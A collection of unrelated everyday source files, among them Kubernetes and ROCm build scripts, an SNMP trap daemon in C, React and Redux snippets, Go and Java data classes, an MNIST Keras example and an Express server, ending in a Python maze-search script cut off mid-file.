# $ deploy-local.sh <deploy_yaml> <vmclasses_yaml>
set -o errexit
set -o pipefail
set -o nounset
YAML=$1
VMCLASSES_YAML=$2
KUBECTL="kubectl"
VMOP_NAMESPACE="vmware-system-vmop"
VMOP_DEPLOYMENT="vmware-system-vmop-controller-manager"
DEPLOYMENT_EXISTS=""
if $KUBECTL get deployment -n ${VMOP_NAMESPACE} ${VMOP_DEPLOYMENT} >/dev/null 2>&1; then
DEPLOYMENT_EXISTS=1
fi
# Deploy and check cert-manager
CERTMANAGER_NAMESPACE="vmware-system-cert-manager"
CERTMANAGER_DEPLOYMENTS=(
cert-manager
cert-manager-cainjector
cert-manager-webhook
)
CERTMAN_EXISTS=""
if $KUBECTL get deployment -n "${CERTMANAGER_NAMESPACE}" "${CERTMANAGER_DEPLOYMENTS[0]}" >/dev/null 2>&1 ; then
CERTMAN_EXISTS="exists"
fi
if [[ -z $CERTMAN_EXISTS ]]; then
./hack/deploy-local-certmanager.sh
for dep in "${CERTMANAGER_DEPLOYMENTS[@]}"; do
$KUBECTL rollout status -n "${CERTMANAGER_NAMESPACE}" deployment "${dep}"
done
# TODO Find a better way to wait for this...
echo $'\nSleeping for 60s - waiting for webhooks to be initialized\n'
sleep 60
fi
# Hack to reduce the number of replicas deployed from 3 to 1
# when deploying onto a single node kind cluster.
NODE_COUNT=$(kubectl get node --no-headers 2>/dev/null | wc -l)
if [ "$NODE_COUNT" -eq 1 ]; then
sed -i -e 's/replicas: 3/replicas: 1/g' "$YAML"
# remove the generated '-e' file on Mac
rm -f "$YAML-e"
fi
$KUBECTL apply -f "$YAML"
if [[ -n $DEPLOYMENT_EXISTS ]]; then
$KUBECTL rollout restart -n ${VMOP_NAMESPACE} deployment ${VMOP_DEPLOYMENT}
$KUBECTL rollout status -n ${VMOP_NAMESPACE} deployment ${VMOP_DEPLOYMENT}
fi
until $KUBECTL wait --for=condition=Ready -n vmware-system-vmop cert/vmware-system-vmop-serving-cert; do
sleep 1
done
# Hack that retries applying the default VM Classes until the
# validating webhook is available.
VMOP_VMCLASSES_ATTEMPTS=0
while true; do
kubectl apply -f "${VMCLASSES_YAML}" && break
VMOP_VMCLASSES_ATTEMPTS=$((VMOP_VMCLASSES_ATTEMPTS + 1))
if [[ $VMOP_VMCLASSES_ATTEMPTS -ge 60 ]]; then
echo "Failed to apply default VM Classes"
exit 1
fi
echo "Cannot create default VM Classes. Trying again."
sleep "5s"
done
|
#!/usr/bin/env bash
# #### #
# VARS #
# #### #
expt_name='objective_test'
env_name='pusher'
algo_name='sac'
dir_prefix=${algo_name}
python_script=${env_name}'_'${algo_name}
log_dir_path='/home/desteban/logs/'${expt_name}'/'${env_name}'/'
#default_seeds=(610 710 810 910 1010)
default_seeds=(610)
seeds=("${@:-${default_seeds[@]}}")
total_seeds=${#seeds[@]}
#init_index=0
#end_index=3
#seeds=("${seeds[@]:${init_index}:${end_index}}")
#default_subtasks=(0 1 -1)
default_subtasks=(-1)
subtasks=("${@:-${default_subtasks[@]}}")
total_subtasks=${#subtasks[@]}
total_scripts=$(($total_seeds * $total_subtasks))
echo "Robolearn DRL script"
echo "Total seeds: ${#seeds[@]}"
echo "Experiment seeds: ${seeds[@]}"
echo ""
for seed_idx in ${!seeds[@]}; do
for subtask_idx in ${!subtasks[@]}; do
seed=${seeds[seed_idx]}
subtask=${subtasks[subtask_idx]}
# script_index=$((index+init_index))
script_index=$(((seed_idx)*total_subtasks + subtask_idx))
echo "********************************************************"
echo "Running '${python_script}.py' $((script_index+1))/${total_scripts} | Seed: ${seed} Subtask: ${subtask}"
expt_name='sub'${subtask}_${algo_name}_${seed}
echo "Log_dir '${log_dir_path}'"
log_dir=${log_dir_path}'sub'${subtask}'/'${dir_prefix}_${seed}
python ../${python_script}.py --seed ${seed} --subtask ${subtask} \
--log_dir ${log_dir} --expt_name ${env_name} --gpu
done
done
|
/*
* straps.c --
*
* A simple SNMP trap-sink. Mainly for scotty's snmp code, but also
* usable by other clients. The straps demon listens to the snmp-trap
* port 162/udp and forwards the received event to connected clients
* (like scotty). Because the port 162 needs root access and the port
* can be opened only once, the use of a simple forwarding demon is
* a good choice.
*
* The client can connect to the AF_UNIX domain stream socket
* /tmp/.straps-<port> and will get the trap-packets in raw binary form:
*
* 4 bytes ip-address (in network-byte-order) of the sender
* 2 bytes port-number (in network-byte-order) of the sender
* 4 bytes data-length (in host-byte-order) followed by the
* n data-bytes of the packet.
*
* Copyright (c) 1994-1996 Technical University of Braunschweig.
*
* See the file "license.terms" for information on usage and redistribution
* of this file, and for a DISCLAIMER OF ALL WARRANTIES.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/un.h>
#include <sys/stat.h>
#include "config.h"
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_SELECT_H
#include <sys/select.h>
#endif
#ifndef FD_SETSIZE
#define FD_SETSIZE 32
#endif
/*
* Default values for the SNMP trap port number, the name of
* the UNIX domain socket and the IP multicast address.
*/
#define SNMP_TRAP_PORT 162
#define SNMP_TRAP_NAME "snmp-trap"
#define SNMP_TRAP_PATH "/tmp/.straps"
#define SNMP_TRAP_MCIP "172.16.58.3"
/*
* A signal handler which basically ignores all SIGPIPE signals.
* It re-installs itself for all the bozo's outside.
*/
#ifdef SIGPIPE
static void
ign_pipe(dummy)
int dummy;
{
signal(SIGPIPE, ign_pipe);
}
#endif
int
main(argc, argv)
int argc;
char *argv[];
{
struct servent *se;
struct sockaddr_in taddr, laddr;
struct sockaddr_un saddr, daddr;
size_t llen, dlen;
int trap_s, serv_s, slen, rc, i;
fd_set fds;
static int cl_addr [FD_SETSIZE];
char buf[2048], path[1024];
int go_on;
int mcast_s = -1;
char *name;
int port;
/*
* Check the number of arguments. We accept an optional argument
* which specifies the port number we are listening on.
*/
if (argc > 2) {
fprintf(stderr, "usage: straps [port]\n");
exit(1);
}
if (argc > 1) {
name = argv[1];
port = atoi(argv[1]);
} else {
name = SNMP_TRAP_NAME;
port = SNMP_TRAP_PORT;
}
/*
* Get the port that we are going to listen to. Check that
* we do not try to open a priviledged port number, with
* the exception of the SNMP trap port.
*/
#ifdef HAVE_GETSERVBYNAME
if ((se = getservbyname(name, "udp"))) {
port = ntohs(se->s_port);
}
if (port != SNMP_TRAP_PORT && port < 1024) {
fprintf(stderr, "straps: access to port %d denied\n", port);
exit(1);
}
#endif
/*
* Open and bind the normal trap socket:
*/
if ((trap_s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("straps: unable to open trap socket");
exit(1);
}
taddr.sin_family = AF_INET;
taddr.sin_port = htons(port);
taddr.sin_addr.s_addr = INADDR_ANY;
if (bind(trap_s, (struct sockaddr *) &taddr, sizeof(taddr)) < 0) {
perror("straps: unable to bind trap socket");
exit(1);
}
#ifdef HAVE_MULTICAST
if ((mcast_s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("straps: unable to open multicast trap socket");
}
if (mcast_s > 0) {
struct ip_mreq mreq;
mreq.imr_multiaddr.s_addr = inet_addr(SNMP_TRAP_MCIP);
mreq.imr_interface.s_addr = htonl(INADDR_ANY);
if (setsockopt(mcast_s, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char*) &mreq,
sizeof(mreq)) == -1) {
perror("straps: unable to join multicast group");
close(mcast_s);
mcast_s = -1;
}
}
#ifdef SO_REUSEADDR
/*
* Allow others to bind to the same UDP port.
*/
if (mcast_s > 0) {
int on = 1;
setsockopt(mcast_s, SOL_SOCKET, SO_REUSEADDR,
(char *) &on, sizeof(on));
}
#endif
if (mcast_s > 0) {
struct sockaddr_in maddr;
maddr.sin_family = AF_INET;
maddr.sin_port = htons(port);
maddr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(mcast_s, (struct sockaddr*) &maddr, sizeof(maddr)) == -1) {
perror("straps: unable to bind multicast trap socket");
close(mcast_s);
mcast_s = -1;
}
}
#endif
/*
* Open the client socket. First unlink the name and set the umask
* to 0. This should not make any problems and it makes security
* people happy. (Suggested by <NAME> <<EMAIL>>)
*/
sprintf(path, "%s-%d", SNMP_TRAP_PATH, port);
unlink(path);
umask(0);
if ((serv_s = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) {
perror("straps: unable to open server socket");
exit(1);
}
memset((char *) &saddr, 0, sizeof(saddr));
saddr.sun_family = AF_UNIX;
strcpy(saddr.sun_path, path);
slen = sizeof(saddr) - sizeof(saddr.sun_path) + strlen(saddr.sun_path);
printf("straps: binding to socket\n");
if (bind(serv_s, (struct sockaddr *) &saddr, slen) < 0) {
perror("straps: unable to bind server socket");
exit(1);
}
if (listen(serv_s, 5) < 0) {
perror("straps: unable to listen on server socket");
exit(1);
}
printf("straps: listening to socket\n");
#ifdef SIGPIPE
signal(SIGPIPE, ign_pipe);
#endif
/*
* Fine everything is ready; lets listen for events:
* the for(;;) loop aborts, if the last client went away.
*/
for (go_on = 1; go_on; ) {
FD_ZERO(&fds);
FD_SET(trap_s, &fds);
FD_SET(serv_s, &fds);
if (mcast_s > 0) {
FD_SET(mcast_s, &fds);
}
/* fd's connected from clients. listen for EOF's: */
for (i = 0; i < FD_SETSIZE; i++) {
if (cl_addr [i] > 0)
FD_SET(i, &fds);
}
rc = select(FD_SETSIZE, &fds, (fd_set *) 0, (fd_set *) 0,
(struct timeval *) 0);
if (rc < 0) {
if (errno == EINTR || errno == EAGAIN)
continue;
perror("straps: select failed");
}
printf("straps: something happened \n");
if (FD_ISSET(trap_s, &fds)) {
printf("straps: trap_s happened\n");
/* read trap message and forward to clients: */
llen = sizeof(laddr);
if ((rc = recvfrom(trap_s, buf, sizeof(buf), 0,
(struct sockaddr *) &laddr, &llen)) < 0) {
perror("straps: recvfrom failed");
continue;
}
for (i = 0; i < FD_SETSIZE; i++) {
if (cl_addr [i] > 0) {
printf("forwarding to %d\n", i);
/* XXX: check writeability */
if (write(i, (char *)
&laddr.sin_addr.s_addr, 4) != 4
|| write(i, (char *) &laddr.sin_port, 2) != 2
|| write(i, (char *) &rc, 4) != 4
|| write(i, buf, rc) != rc) {
cl_addr [i] = 0;
close(i);
}
}
}
/* should we go on ? */
for (go_on = 0, i = 0; i < FD_SETSIZE; i++) {
go_on += cl_addr [i] > 0;
}
} else if (mcast_s > 0 && FD_ISSET(mcast_s, &fds)) {
printf("straps: mcast_s happened\n");
/* read trap message and forward to clients: */
llen = sizeof(laddr);
if ((rc = recvfrom(mcast_s, buf, sizeof(buf), 0,
(struct sockaddr *) &laddr, &llen)) < 0) {
perror("straps: recvfrom failed");
continue;
}
for (i = 0; i < FD_SETSIZE; i++) {
if (cl_addr [i] > 0) {
/* XXX: check writeability */
if (write(i, (char *)
&laddr.sin_addr.s_addr, 4) != 4
|| write(i, (char *) &laddr.sin_port, 2) != 2
|| write(i, (char *) &rc, 4) != 4
|| write(i, buf, rc) != rc) {
cl_addr [i] = 0;
close(i);
}
}
}
/* should we go on ? */
for (go_on = 0, i = 0; i < FD_SETSIZE; i++) {
go_on += cl_addr [i] > 0;
}
} else if (FD_ISSET(serv_s, &fds)) {
printf("straps: serv_s happened\n");
/* accept a new client: */
memset((char *) &daddr, 0, sizeof(daddr));
dlen = sizeof(daddr);
rc = accept(serv_s, (struct sockaddr *) &daddr, &dlen);
if (rc < 0) {
perror("straps: accept failed");
continue;
}
cl_addr [rc] = 1;
} else {
printf("straps: ??? happened\n");
/* fd's connected from clients. (XXX: should check for EOF): */
for (i = 0; i < FD_SETSIZE; i++) {
if (cl_addr [i] > 0 && FD_ISSET(i, &fds)) {
cl_addr [i] = 0;
close(i);
}
}
/* should we go on ? */
for (go_on = 0, i = 0; i < FD_SETSIZE; i++) {
go_on += cl_addr [i] > 0;
}
}
} /* end for (;;) */
unlink(path);
printf("straps: bye\n");
return 0;
}
|
<filename>lang/py/cookbook/v2/source/cb2_4_20_exm_2.py
printf('Result tuple is: %r', result_tuple)
|
#!/bin/bash
###############################################################################
# Copyright (c) 2018 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
BASE_DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
set -e
trap 'lastcmd=$curcmd; curcmd=$BASH_COMMAND' DEBUG
trap 'errno=$?; print_cmd=$lastcmd; if [ $errno -ne 0 ]; then echo "\"${print_cmd}\" command failed with exit code $errno."; fi' EXIT
source "$BASE_DIR/common/common_options.sh"
parse_args "$@"
# This script only builds meta-packages which do not have source code.
# If we are not building packages, skip it.
if [ ${ROCM_FORCE_PACKAGE} = false ]; then
exit 0
fi
# Need to be able to build RPM files if we want to create meta-packages
if [ ${ROCM_LOCAL_INSTALL} = false ] || [ ${ROCM_INSTALL_PREREQS} = true ]; then
echo "Installing software required to build meta-packages"
echo "You will need to have root privileges to do this."
sudo yum -y install rpm-build
if [ ${ROCM_INSTALL_PREREQS} = true ] && [ ${ROCM_FORCE_GET_CODE} = false ]; then
exit 0
fi
fi
# Set up source-code directory
if [ $ROCM_SAVE_SOURCE = true ]; then
SOURCE_DIR=${ROCM_SOURCE_DIR}
if [ ${ROCM_FORCE_GET_CODE} = true ] && [ -d ${SOURCE_DIR}/meta_packages ]; then
rm -rf ${SOURCE_DIR}/meta_packages
fi
else
SOURCE_DIR=`mktemp -d`
fi
mkdir -p ${SOURCE_DIR}/meta_packages
cd ${SOURCE_DIR}/meta_packages
if [ ${ROCM_FORCE_GET_CODE} = true ]; then
echo "No code download is required for this. Exiting."
exit 0
fi
if [ ${ROCM_FORCE_BUILD_ONLY} = true ]; then
echo "No build is required for this. Existing."
exit 0
fi
# Our libraries ROCm meta-package is:
# * rocm-libs, which depends/installs: rocblas, rocfft, rocrand, and hipblas
if [ ${ROCM_FORCE_PACKAGE} = true ]; then
for pkg_name in rocm-libs; do
mkdir -p ${SOURCE_DIR}/meta_packages/${pkg_name}
cd ${SOURCE_DIR}/meta_packages/${pkg_name}/
pushd ${BASE_DIR}/../common/
cp ./${pkg_name}.spec ${SOURCE_DIR}/meta_packages/${pkg_name}/
popd
sed -i 's/ROCM_PKG_VERSION/'${ROCM_VERSION_LONG}'/g' ./${pkg_name}.spec
sed -i 's#ROCM_OUTPUT_DIR#'${ROCM_OUTPUT_DIR%/}'#g' ./${pkg_name}.spec
mkdir -p $(pwd)/${ROCM_OUTPUT_DIR}/.info/
echo ${ROCM_VERSION_LONG} > $(pwd)/${ROCM_OUTPUT_DIR}/.info/version-libs
RPM_TEMP_DIR=`mktemp -d`
rpmbuild -bb --clean --define "_topdir ${RPM_TEMP_DIR}" ./${pkg_name}.spec
cp ${RPM_TEMP_DIR}/RPMS/x86_64/${pkg_name}-*.rpm .
rm -rf ${RPM_TEMP_DIR}
echo "Copying `ls -1 ${pkg_name}-*.rpm` to ${ROCM_PACKAGE_DIR}"
mkdir -p ${ROCM_PACKAGE_DIR}
cp ${pkg_name}-*.rpm ${ROCM_PACKAGE_DIR}
if [ ${ROCM_LOCAL_INSTALL} = false ]; then
ROCM_PKG_IS_INSTALLED=`rpm -qa | grep ${pkg_name} | wc -l`
if [ ${ROCM_PKG_IS_INSTALLED} -gt 0 ]; then
FULL_PKG_NAME=`rpm -qa | grep ${pkg_name} | head -n 1`
sudo rpm -e --nodeps ${FULL_PKG_NAME}
fi
sudo rpm -i ${pkg_name}-*.rpm
fi
done
fi
if [ $ROCM_SAVE_SOURCE = false ]; then
rm -rf ${SOURCE_DIR}
fi
|
<filename>src/pages/App/App.tsx
import CssBaseline from '@material-ui/core/CssBaseline';
import * as React from 'react';
import { Route, Switch } from 'react-router-dom';
import Header from '../../components/Header';
import Home from '../Home';
import StockDetail from '../StockDetail';
import classes from './App.scss';
class App extends React.Component {
public render() {
return (
<div className={classes.App}>
<CssBaseline />
<Header />
<Switch>
<Route exact={true} path="/" component={Home}/>
<Route path="/stock/:symbol" component={StockDetail}/>
</Switch>
</div>
);
}
}
export default App;
|
#!/usr/bin/env bash
set -e
cd "$(dirname "$BASH_SOURCE")/.."
# Downloads dependencies into vendor/ directory
mkdir -p vendor
cd vendor
clone() {
vcs=$1
pkg=$2
rev=$3
pkg_url=https://$pkg
target_dir=src/$pkg
echo -n "$pkg @ $rev: "
if [ -d $target_dir ]; then
echo -n 'rm old, '
rm -fr $target_dir
fi
echo -n 'clone, '
case $vcs in
git)
git clone --quiet --no-checkout $pkg_url $target_dir
( cd $target_dir && git reset --quiet --hard $rev )
;;
hg)
hg clone --quiet --updaterev $rev $pkg_url $target_dir
;;
esac
echo -n 'rm VCS, '
( cd $target_dir && rm -rf .{git,hg} )
echo -n 'rm vendor, '
( cd $target_dir && rm -rf vendor Godeps/_workspace )
echo done
}
# the following lines are in sorted order, FYI
clone git github.com/Sirupsen/logrus v0.7.3 # logrus is a common dependency among multiple deps
clone git github.com/docker/libtrust 230dfd18c232
clone git github.com/go-check/check 64131543e7896d5bcc6bd5a76287eb75ea96c673
clone git github.com/go-fsnotify/fsnotify v1.2.0
clone git github.com/gorilla/context 14f550f51a
clone git github.com/gorilla/mux e444e69cbd
clone git github.com/kr/pty 05017fcccf
clone git github.com/tchap/go-patricia v2.1.0
clone hg code.google.com/p/go.net 84a4013f96e0
clone hg code.google.com/p/gosqlite 74691fb6f837
# get distribution packages
clone git github.com/docker/distribution d957768537c5af40e4f4cd96871f7b2bde9e2923
mv src/github.com/docker/distribution/digest tmp-digest
mv src/github.com/docker/distribution/registry/api tmp-api
rm -rf src/github.com/docker/distribution
mkdir -p src/github.com/docker/distribution
mv tmp-digest src/github.com/docker/distribution/digest
mkdir -p src/github.com/docker/distribution/registry
mv tmp-api src/github.com/docker/distribution/registry/api
clone git github.com/docker/libcontainer 90f8aa670f1f424041059060c7c63fe4dee2e441
# libcontainer deps (see src/github.com/docker/libcontainer/update-vendor.sh)
clone git github.com/coreos/go-systemd v2
clone git github.com/godbus/dbus v2
clone git github.com/syndtr/gocapability 8e4cdcb
|
import { combineReducers } from 'redux';
import { makeCommunicationReducer } from 'shared/helpers/redux';
import { ReducersMap } from 'shared/types/redux';
import * as NS from '../../namespace';
import { initial } from '../data/initial';
// tslint:disable:max-line-length
export const communicationReducer = combineReducers<NS.IReduxState['communication']>({
getApiKeys: makeCommunicationReducer<NS.IGetApiKeys, NS.IGetApiKeysSuccess, NS.IGetApiKeysFail>(
'API_KEYS:GET_API_KEYS',
'API_KEYS:GET_API_KEYS_SUCCESS',
'API_KEYS:GET_API_KEYS_FAIL',
initial.communication.getApiKeys,
),
addApiKey: makeCommunicationReducer<NS.IAddApiKey, NS.IAddApiKeySuccess, NS.IAddApiKeyFail>(
'API_KEYS:ADD_API_KEY',
'API_KEYS:ADD_API_KEY_SUCCESS',
'API_KEYS:ADD_API_KEY_FAIL',
initial.communication.addApiKey,
),
removeApiKey: makeCommunicationReducer<NS.IRemoveApiKey, NS.IRemoveApiKeySuccess, NS.IRemoveApiKeyFail>(
'API_KEYS:REMOVE_API_KEY',
'API_KEYS:REMOVE_API_KEY_SUCCESS',
'API_KEYS:REMOVE_API_KEY_FAIL',
initial.communication.removeApiKey,
)
} as ReducersMap<NS.IReduxState['communication']>);
|
package com.therootcoder.sample.masterslavespring.annotation;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
/**
*
* It is used to declare the repository for read-only( data fetch queries only) operations.
* One must not declare/use DML methods in repository annotated with @ReadOnly
*
* @author <NAME>
* @since 22-Mar-2019
**/
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
public @interface ReadOnly {
}
|
<gh_stars>1-10
package entity
import (
"context"
"github.com/blushft/strana/modules/sink/reporter/store"
"github.com/blushft/strana/modules/sink/reporter/store/ent"
"github.com/blushft/strana/modules/sink/reporter/store/ent/app"
)
type App struct {
ID int `db:"id" json:"id"`
Name string `db:"name" json:"name"`
Version string
Build string
Properties map[string]interface{}
}
type AppReader interface {
List() ([]*App, error)
Get(int) (*App, error)
}
type AppWriter interface {
Create(*App) error
Update(*App) error
Delete(*App) error
}
type appRepo interface {
AppReader
AppWriter
}
type AppManager interface {
appRepo
}
type AppReporter interface {
AppReader
}
type appManager struct {
store *store.Store
}
func NewAppService(s *store.Store) *appManager {
return &appManager{
store: s,
}
}
func (mgr *appManager) List() ([]*App, error) {
c := mgr.store.Client().App
recs, err := c.Query().All(context.TODO())
if err != nil {
return nil, err
}
return siteSchemasToEntities(recs), nil
}
func (mgr *appManager) Get(id int) (*App, error) {
c := mgr.store.Client().App
rec, err := c.Get(context.TODO(), id)
if err != nil {
return nil, err
}
return siteSchemaToEntity(rec), nil
}
func (mgr *appManager) GetByName(name string) ([]*App, error) {
c := mgr.store.Client().App
rec, err := c.Query().Where(app.Name(name)).All(context.TODO())
if err != nil {
return nil, err
}
return siteSchemasToEntities(rec), nil
}
func siteSchemasToEntities(sch []*ent.App) []*App {
var res []*App
for _, rec := range sch {
res = append(res, siteSchemaToEntity(rec))
}
return res
}
func siteSchemaToEntity(sch *ent.App) *App {
return &App{
ID: sch.ID,
Name: sch.Name,
Version: sch.Version,
Build: sch.Build,
Properties: sch.Properties,
}
}
func siteEntityCreate(c *ent.AppClient, e *App) *ent.AppCreate {
return c.Create().
SetName(e.Name).
SetVersion(e.Version).
SetBuild(e.Build).
SetProperties(e.Properties)
}
func siteEntityUpdate(c *ent.AppClient, e *App) *ent.AppUpdate {
return c.Update().
SetName(e.Name).
SetVersion(e.Version).
SetBuild(e.Build).
SetProperties(e.Properties)
}
|
<reponame>olivierdemeijer/connect-sdk-java
package com.globalcollect.gateway.sdk.java.gc.product.definitions;
import java.util.List;
public class FixedListValidator {
private List<String> allowedValues = null;
public List<String> getAllowedValues() {
return allowedValues;
}
public void setAllowedValues(List<String> value) {
this.allowedValues = value;
}
}
|
#!/bin/bash
version=`git ls-remote --tags --sort -refname https://github.com/my-devices/sdk.git | grep -v '\^{}' | head -1 | awk '{ print $2 }' | sed 's#refs/tags/##'`
if [[ "$version" =~ ^v[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] ; then
echo $version
else
echo unknown
fi
|
import tensorflow as tf
# Download the MNIST dataset
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Normalize the data
x_train = tf.keras.utils.normalize(x_train, axis=1)
x_test = tf.keras.utils.normalize(x_test, axis=1)
# Define the model
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))
# Compile the model
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# Train the model
model.fit(x_train, y_train, epochs=3)
# Evaluate the model
val_loss, val_acc = model.evaluate(x_test, y_test)
print(val_loss, val_acc)
|
const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const btcController = require('./btcController').default;
app.use(bodyParser.json()); // support json encoded bodies
app.use(bodyParser.urlencoded({ extended: true })); // support encoded bodies
app.get('/', function (req, res) {
res.send('Hello World!');
});
app.listen(3000, function () {
console.log('Example app listening on port 3000!');
});
app.post('/notify', function (req, res) {
console.log("/notify");
console.log(req.body);
res.json({ok: true});
if (req.body.c === 'block') {
console.log('new block');
btcController.getBlockById(req.body.txid);
} else {
console.log('Other event');
}
});
app.get('/block/height/:height', btcController.getBlockByHeight);
app.get('/tx/:txid', btcController.getTxById);
|
<reponame>MiguelDelPinto/LCOM_TPs<filename>lab4/i8042.h<gh_stars>0
#ifndef _LCOM_I8042_H_
#define _LCOM_I8042_H_
#include <lcom/lcf.h>
#include <minix/sysutil.h>
/** @defgroup i8042 i8042
* @{
*
* Constants for programming the i8042 Keyboard.
*/
/* General macros */
#define KBD_IRQ 1
#define MOUSE_IRQ 12
#define DELAY_US 20000
#define WAIT_KBC tickdelay(micros_to_ticks(DELAY_US))
#define DELAY(n) tickdelay(micros_to_ticks(n))
#define MAX_TRIES 5
/* I/O port addresses */
#define KBC_STATUS_PORT 0x64
#define KBC_OUT_BUF 0x60
#define KBC_INPT_BUF_COM 0x64
#define KBC_INPT_BUF_ARG 0x60
/* Status register masks */
#define OUT_BUF_FULL BIT(0)
#define INPT_BUF_FULL BIT(1)
#define TRANSMIT_TIME_OUT BIT(5)
#define RECEIVE_TIME_OUT BIT(6)
#define PARITY_ERROR BIT(7)
//PS2 mode
#define AUXILIARY_DEVICE BIT(5)
#define PS2_TIME_OUT BIT(6)
/* Scancodes */
#define MAKE_CODE BIT(7)
#define INCOMPLETE_CODE 0xE0
#define ESC_MAKE_CODE 0x01
#define ESC_BREAK_CODE 0x81
/* KBC commands */
#define WRITE_CMD_BYTE 0x60
#define READ_CMD_BYTE 0x20
#define WRITE_MOUSE 0xD4
#define ENABLE_DATA_REPORT 0xF4
#define DISABLE_DATA_REPORT 0xF5
#define STREAM_MODE 0xEA
#define READ_DATA 0xEB
/* Mouse acknowledgment bytes */
#define ACK 0xFA
#define NACK 0xFE
#define ERROR 0xFC
/* Packet struct */
#define LB BIT(0)
#define RB BIT(1)
#define MB BIT(2)
#define X_SIGN BIT(4)
#define Y_SIGN BIT(5)
#define X_OVF BIT(6)
#define Y_OVF BIT(7)
/* Mouse packet */
#define FIRST_PACKET BIT(3)
/* KBC arguments */
#define ENABLE_INTERRUPTS 1
#endif /* _LCOM_I8042_H */
|
package org.librairy.harvester.datosgobes.executions;
import org.librairy.harvester.datosgobes.model.Row;
import org.librairy.harvester.datosgobes.service.ParsingService;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.*;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;
import java.util.stream.Collectors;
/**
* @author <NAME>, Carlos <<EMAIL>>
*/
public class ParseData {
private static final Logger LOG = LoggerFactory.getLogger(ParseData.class);
public static final String filePath = "/Users/cbadenes/Documents/OEG/Cloud/projects/DesafioAporta_2017/datasets-gob-es-parsed.csv";
private static Function<String, Row> mapToItem = (line) -> {
return Row.fromCSV(line);
};
private static List<Row> load(String csvFile){
List<Row> rows = new ArrayList<Row>();
try{
File inputF = new File(csvFile);
InputStream inputFS = new FileInputStream(inputF);
BufferedReader br = new BufferedReader(new InputStreamReader(inputFS));
//inputList = br.lines().skip(1).map(mapToItem).collect(Collectors.toList());
rows = br.lines().map(mapToItem).collect(Collectors.toList());
br.close();
} catch (IOException e) {
e.printStackTrace();
}
return rows;
}
public static void main(String[] args) throws Exception {
String inputPath = DownloadData.filePath;
String outputPath = filePath;
// Prepare output file
FileWriter writer = new FileWriter(new File(outputPath));
// Initialize Services
ParsingService parsingService = new ParsingService();
// Tokenize descriptions
Instant start = Instant.now();
load(inputPath).parallelStream().map( d -> d.setDescription(parsingService.tokenize(d.getDescription()))).forEach(d -> {
try {
writer.write(d.toCSV()+"\n");
System.out.println("Dataset processed: " + d.getId());
} catch (IOException e) {
e.printStackTrace();
}
});
Instant end = Instant.now();
writer.close();
LOG.info("Datasets parsed from datos.gob.es at: " + outputPath);
LOG.info("Executed in: " + ChronoUnit.MINUTES.between(start,end) + "min " + (ChronoUnit.SECONDS.between(start,end)%60) + "secs");
}
}
|
SELECT c.Name as CustomerName, p.Name as ProductName, o.order_date
FROM customers c
JOIN orders o ON c.CustomerId = o.CustomerId
JOIN products p ON p.ProductId = o.ProductId;
|
import sys
from computer import Computer
from copy import deepcopy
def move(comp, position, step_count):
step_count += 1
for i in range(4):
pos = deepcopy(position)
if i == 0:
pos[1] += 1
elif i == 1:
pos[1] -= 1
elif i == 2:
pos[0] -= 1
else:
pos[0] += 1
if tuple(pos) in layout:
continue
new_comp = deepcopy(comp)
new_comp.input(i+1)
new_comp.run()
out = new_comp.output()[0]
layout[tuple(pos)] = out
if out == 0:
continue
else:
queue.append((new_comp, pos, step_count))
if out == 2:
print(step_count)
return pos
return None
def fill(position, step_count):
step_count += 1
n = (position[0], position[1] + 1)
s = (position[0], position[1] - 1)
w = (position[0] + 1, position[1])
e = (position[0] - 1, position[1])
nn = 0
sn = 0
wn = 0
en = 0
if n in layout and layout[n] != 0 and n not in flood:
flood[n] = step_count
nn = 1 + fill(n, step_count)
if s in layout and layout[s] != 0 and s not in flood:
flood[s] = step_count
sn = 1 + fill(s, step_count)
if w in layout and layout[w] != 0 and w not in flood:
flood[w] = step_count
wn = 1 + fill(w, step_count)
if e in layout and layout[e] != 0 and e not in flood:
flood[e] = step_count
en = 1 + fill(e, step_count)
return max(nn, sn, wn, en)
c = Computer(sys.argv[1])
layout = {(0, 0): 1}
queue = [(c, [0, 0], 0)]
